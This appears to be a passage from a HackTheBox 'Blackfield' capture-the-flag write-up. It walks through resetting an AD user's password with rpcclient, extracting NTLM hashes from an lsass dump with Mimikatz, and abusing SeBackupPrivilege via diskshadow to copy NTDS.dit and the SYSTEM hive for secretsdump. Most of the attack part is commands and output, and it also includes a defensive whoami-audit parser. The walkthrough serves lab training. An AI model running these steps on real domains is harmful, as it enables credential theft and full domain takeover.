SeImpersonatePrivilege 0:29 (0x0:0x1d)
SeCreateGlobalPrivilege 0:30 (0x0:0x1e)
SeTrustedCredManAccessPrivilege 0:31 (0x0:0x1f)
SeRelabelPrivilege 0:32 (0x0:0x20)
SeIncreaseWorkingSetPrivilege 0:33 (0x0:0x21)
SeTimeZonePrivilege 0:34 (0x0:0x22)
SeCreateSymbolicLinkPrivilege 0:35 (0x0:0x23)
SeDelegateSessionUserImpersonatePrivilege 0:36 (0x0:0x24)
rpcclient $>

One of the privileges this user has is the ability to change other users' passwords.
(Ref: https://malicious.link/post/2017/reset-ad-user-password-with-linux/)
Using that, I reset the password of the user audit2020:

rpcclient $> setuserinfo2 audit2020 23 'fixed0X'

Log in with these credentials:

root@strike:~/Desktop# smbclient  //blackfield.htb/forensic -U audit2020
WARNING: The "encrypt passwords" option is deprecated
Unknown parameter encountered: "winbind trusted domains only"
Ignoring unknown parameter "winbind trusted domains only"
WARNING: The "null passwords" option is deprecated
Enter WORKGROUP\audit2020's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sun Feb 23 15:03:16 2020
.. D 0 Sun Feb 23 15:03:16 2020
commands_output D 0 Sun Feb 23 20:14:37 2020
memory_analysis D 0 Thu May 28 22:28:33 2020
tools D 0 Sun Feb 23 15:39:08 2020

7846143 blocks of size 4096. 3459074 blocks available
smb: \> cd memory_analysis\
smb: \memory_analysis\> ls
. D 0 Thu May 28 22:28:33 2020
.. D 0 Thu May 28 22:28:33 2020
conhost.zip A 37876530 Thu May 28 22:25:36 2020
ctfmon.zip A 24962333 Thu May 28 22:25:45 2020
dfsrs.zip A 23993305 Thu May 28 22:25:54 2020
dllhost.zip A 18366396 Thu May 28 22:26:04 2020
ismserv.zip A 8810157 Thu May 28 22:26:13 2020
lsass.zip A 41936098 Thu May 28 22:25:08 2020
mmc.zip A 64288607 Thu May 28 22:25:25 2020
RuntimeBroker.zip A 13332174 Thu May 28 22:26:24 2020
ServerManager.zip A 131983313 Thu May 28 22:26:49 2020
sihost.zip A 33141744 Thu May 28 22:27:00 2020
smartscreen.zip A 33756344 Thu May 28 22:27:11 2020
svchost.zip A 14408833 Thu May 28 22:27:19 2020
taskhostw.zip A 34631412 Thu May 28 22:27:30 2020
winlogon.zip A 14255089 Thu May 28 22:27:38 2020
wlms.zip A 4067425 Thu May 28 22:27:44 2020
WmiPrvSE.zip A 18303252 Thu May 28 22:27:53 2020

7846143 blocks of size 4096. 3459072 blocks available
smb: \memory_analysis\> get lsass.zip
getting file \memory_analysis\lsass.zip of size 41936098 as lsass.zip (1539.4 KiloBytes/sec) (average 1539.4 KiloBytes/sec)
smb: \memory_analysis\>

After searching around, I downloaded lsass.zip; after unzipping it I found an lsass.DMP file.

A .DMP file is a memory dump, which is created when a program crashes.
So we can extract useful information, such as NTLM hashes, from this file using Mimikatz.
(Ref: https://medium.com/@markmotig/some-ways-to-dump-lsass-exe-c4a75fdc49bf)

Authentication Id : 0 ; 406458 (00000000:000633ba)
Session : Interactive from 2
User Name : svc_backup
Domain : BLACKFIELD
Logon Server : DC01
Logon Time : 23-02-2020 23:30:03
SID : S-1-5-21-4194615774-2175524697-3563712290-1413
msv :
[00000003] Primary
* Username : svc_backup
* Domain : BLACKFIELD
* NTLM : 9658d1d1dcd9250115e2205d9f48400d
* SHA1 : 463c13a9a31fc3252c68ba0a44f0221626a33e5c
* DPAPI : a03cd8e9d30171f3cfe8caad92fef621
tspkg :
wdigest :
* Username : svc_backup
* Domain : BLACKFIELD
* Password : (null)
kerberos :
* Username : svc_backup
* Domain : BLACKFIELD.LOCAL
* Password : (null)
ssp :
credman :


Authentication Id : 0 ; 153705 (00000000:00025869)
Session : Interactive from 1
User Name : Administrator
Domain : BLACKFIELD
Logon Server : DC01
Logon Time : 23-02-2020 23:29:04
SID : S-1-5-21-4194615774-2175524697-3563712290-500
msv :
[00000003] Primary
* Username : Administrator
* Domain : BLACKFIELD
* NTLM : 7f1e4ff8c6a8e6b6fcae2d9c0572cd62
* SHA1 : db5c89a961644f0978b4b69a4d2a2239d7886368
* DPAPI : 240339f898b6ac4ce3f34702e4a89550
tspkg :
wdigest :
* Username : Administrator
* Domain : BLACKFIELD
* Password : (null)
kerberos :
* Username : Administrator
* Domain : BLACKFIELD.LOCAL
* Password : (null)

Now we have the svc_backup hash; let's log in.

Gained the user flag!

Privilege Escalation

I checked what privileges this user has:

*Evil-WinRM* PS C:\Users\svc_backup\Desktop> whoami /all

USER INFORMATION
----------------

User Name SID
===================== ==============================================
blackfield\svc_backup S-1-5-21-4194615774-2175524697-3563712290-1413


GROUP INFORMATION
-----------------

Group Name Type SID Attributes
========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Backup Operators Alias S-1-5-32-551 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288


PRIVILEGES INFORMATION
----------------------

Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.
*Evil-WinRM* PS C:\Users\svc_backup\Desktop>
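Before moving on, this is what a defender would flag in that whoami /all output: a service account that is both remotely reachable (Remote Management Users) and a member of Backup Operators with SeBackupPrivilege and SeRestorePrivilege enabled, which on a domain controller is as good as domain admin. The parser below is an added example, not from the write-up; its sample input is a trimmed copy of the output above, and the group SIDs and privilege names are the standard Windows well-known values.

```python
"""Least-privilege check over `whoami /all` output.

Added example, not from the original write-up. It parses the GROUP
INFORMATION and PRIVILEGES INFORMATION tables exactly as whoami /all prints
them and reports the combination that matters on a domain controller: a
remotely reachable account holding ACL-bypassing privileges.
"""
import re

# Trimmed copy of the svc_backup output shown above, used as sample input.
SAMPLE_WHOAMI = r"""
USER INFORMATION
----------------

User Name             SID
===================== ==============================================
blackfield\svc_backup S-1-5-21-4194615774-2175524697-3563712290-1413


GROUP INFORMATION
-----------------

Group Name                      Type             SID          Attributes
=============================== ================ ============ ==================================================
Everyone                        Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Backup Operators        Alias            S-1-5-32-551 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
"""

SECTIONS = {"USER INFORMATION": "user", "GROUP INFORMATION": "group",
            "PRIVILEGES INFORMATION": "priv", "USER CLAIMS INFORMATION": "claims"}
USER_RE = re.compile(r"^(\S+\\\S+)\s+(S-1-[\d-]+)$")
GROUP_RE = re.compile(r"^(.+?)\s+(Well-known group|Alias|Group|Label|Unknown SID type)"
                      r"\s+(S-1-[\d-]+)\s*(.*)$")
PRIV_RE = re.compile(r"^(Se\w+Privilege)\s+(.+?)\s+(Enabled|Disabled)$")

# Privileges that bypass object ACLs; on a DC any one of them lets the account
# reach NTDS.dit or the SYSTEM hive, so they belong to admins only.
ACL_BYPASS_PRIVS = {
    "SeBackupPrivilege": "read any file regardless of ACL",
    "SeRestorePrivilege": "write any file or registry key regardless of ACL",
    "SeTakeOwnershipPrivilege": "take ownership of any object",
    "SeDebugPrivilege": "open any process",
    "SeLoadDriverPrivilege": "load kernel drivers",
    "SeTcbPrivilege": "act as part of the operating system",
}
PRIVILEGED_GROUPS = {"S-1-5-32-544": "Administrators", "S-1-5-32-548": "Account Operators",
                     "S-1-5-32-549": "Server Operators", "S-1-5-32-551": "Backup Operators"}
REMOTE_GROUPS = {"S-1-5-32-580": "Remote Management Users", "S-1-5-32-555": "Remote Desktop Users"}


def audit_whoami(text):
    """Parse the three tables and return identity, groups, enabled privileges
    and findings; high_risk marks remote access combined with ACL bypass."""
    result = {"user": None, "groups": [], "enabled_privileges": [], "findings": []}
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTIONS:
            section = SECTIONS[line]
            continue
        if section == "user":
            m = USER_RE.match(line)
            if m:
                result["user"] = m.group(1)
        elif section == "group":
            m = GROUP_RE.match(line)
            if m:
                result["groups"].append((m.group(1), m.group(3)))
        elif section == "priv":
            m = PRIV_RE.match(line)
            if m and m.group(3) == "Enabled":
                result["enabled_privileges"].append(m.group(1))
    sids = {sid for _, sid in result["groups"]}
    for sid, name in PRIVILEGED_GROUPS.items():
        if sid in sids:
            result["findings"].append("member of BUILTIN\\%s (%s)" % (name, sid))
    bypass = [p for p in result["enabled_privileges"] if p in ACL_BYPASS_PRIVS]
    for p in bypass:
        result["findings"].append("%s enabled: %s" % (p, ACL_BYPASS_PRIVS[p]))
    result["remote_access"] = [n for s, n in REMOTE_GROUPS.items() if s in sids]
    result["high_risk"] = bool(result["remote_access"]) and bool(bypass)
    return result
```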
  • So the user can back up data, which means I can back up the NTDS.dit file, which stores AD data including information about user objects, groups and group membership.
  • After searching, I found that I need to use diskshadow; I found a simple script that runs commands through DiskShadow and uploaded it:
*Evil-WinRM* PS C:\temp> diskshadow /s text.txt
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer: DC01, 6/12/2020 4:21:22 PM

-> SET CONTEXT PERSISTENT NOWRITERS
-> add volume c: alias text
-> create
Alias 0xprashant for shadow ID {84b7f11c-93da-4701-9af4-2c0adfc7cb2e} set as environment variable.
Alias VSS_SHADOW_SET for shadow set ID {c38f96e5-6d7e-49f8-b605-25b0b25934e9} set as environment variable.

Querying all shadow copies with the shadow copy set ID {c38f96e5-6d7e-49f8-b605-25b0b25934e9}

* Shadow copy ID = {84b7f11c-93da-4701-9af4-2c0adfc7cb2e} %0xprashant%
- Shadow copy set: {c38f96e5-6d7e-49f8-b605-25b0b25934e9} %VSS_SHADOW_SET%
- Original count of shadow copies = 1
- Original volume name: \\?\Volume{351b4712-0000-0000-0000-602200000000}\ [C:\]
- Creation time: 6/10/2020 3:41:17 PM
- Shadow copy device name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2
- Originating machine: DC01.BLACKFIELD.local
- Service machine: DC01.BLACKFIELD.local
- Not exposed
- Provider ID: {b5946137-7b9f-4925-af80-51abd60b20d5}
- Attributes: No_Auto_Release Persistent No_Writers Differential

Number of shadow copies listed: 1
-> expose %text% z:
-> %0xprashant% = {84b7f11c-93da-4701-9af4-2c0adfc7cb2e}
The shadow copy was successfully exposed as z:\.

Now we will try to copy NTDS.dit.
Upload this tool: https://github.com/giuliano108/SeBackupPrivilege/tree/master/SeBackupPrivilegeCmdLets/bin/Debug

*Evil-WinRM* PS C:\temp> upload /root/Desktop/SeBackupPrivilegeCmdLets.dll
Info: Uploading /root/Desktop/SeBackupPrivilegeCmdLets.dll to C:\temp\SeBackupPrivilegeCmdLets.dll


Data: 16384 bytes of 16384 bytes copied

Info: Upload successful!

*Evil-WinRM* PS C:\temp> upload /root/Desktop/SeBackupPrivilegeUtils.dll
Info: Uploading /root/Desktop/SeBackupPrivilegeUtils.dll to C:\temp\SeBackupPrivilegeUtils.dll


Data: 21844 bytes of 21844 bytes copied

Info: Upload successful!

Import the modules:

*Evil-WinRM* PS C:\temp> import-module .\SeBackupPrivilegeUtils.dll
*Evil-WinRM* PS C:\temp> import-module .\SeBackupPrivilegeCmdLets.dll

Copy NTDS.dit out of the exposed shadow copy:

Copy-FileSebackupPrivilege z:\Windows\NTDS\ntds.dit C:\temp\ndts.dit

Save the SYSTEM hive and download both files:

*Evil-WinRM* PS C:\temp> reg save HKLM\SYSTEM c:\temp\system
*Evil-WinRM* PS C:\temp> download system
*Evil-WinRM* PS C:\temp> download

After downloading them, I dumped the NTLM hashes from SYSTEM and NTDS.dit using Impacket's secretsdump.py script.
Now we have the Administrator NTLM hash; let's log in.

Ref:
Reset password in rpcclient : https://malicious.link/post/2017/reset-ad-user-password-with-linux/
Dump lsass.dmp : https://medium.com/@markmotig/some-ways-to-dump-lsass-exe-c4a75fdc49bf
Mimikatz : https://github.com/gentilkiwi/mimikatz/releases
BackupPrivilege : https://hackinparis.com/data/slides/2019/talks/HIP2019-Andrea_Pierini-Whoami_Priv_Show_Me_Your_Privileges_And_I_Will_Lead_You_To_System.pdf

If you learned anything useful from this write-up, respect me on HackTheBox.

CTFer | Computer Science Student